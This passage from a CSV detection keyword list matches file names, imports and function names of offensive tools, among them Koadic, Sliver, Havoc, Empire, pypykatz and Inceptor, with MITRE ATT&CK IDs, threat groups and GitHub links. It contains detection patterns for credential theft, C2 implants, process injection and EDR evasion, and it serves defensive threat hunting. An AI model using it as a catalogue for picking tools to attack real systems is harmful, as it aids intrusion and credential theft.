Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/gather/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/inject/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/persist/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/pivot/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/sliver/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*Implant\SleepMask*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*implant-callback.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*ImplantSSP.csproj*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*import _eternalhush*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*import apypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*import BaseSprayModule*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*import DCSYNC*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*import DNSListener*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*import EnablePersistence*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*import eternalhush.*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*import IBurpExtender*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,0,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*import impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*import ImpactDecoder*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*import ImpactPacket*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*import LdapSearchBofParser*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*import metame,offensive_tool_keyword,metame,metame is a metamorphic code engine for arbitrary executables,T1027 - T1059.003 - T1140,TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/a0rtega/metame,1,0,N/A,N/A,6,508,96,2019-10-06T18:24:14Z,2016-08-07T13:56:57Z -*import mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*import np_server*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*import Payload*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*import pe.OBJExecutable*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,0,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*Import powerview*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*import PupyConfig*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*import PyInstaller*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*import pypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*import ShadowForgeHome*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*import SimpleHTTPServer*,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*import Stager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*import udmp_parser*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*import wapiti*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*import wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*import/nessus/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*import/nexpose*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*import_msf_web*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ImportDll::GetAsyncKeyState*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllImports -PEInfo *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Import-DllImports*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Import-DllInRemoteProcess*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Import-Module *Microsoft.ActiveDirectory.Management.dll*,offensive_tool_keyword,powershell,redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed,T1110.001 - T1110.003 - T1110.004,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1,1,0,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*Inactive Domain Admins Honey Tokens*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*inceptor*POWERSHELL*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*inceptor.py *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z 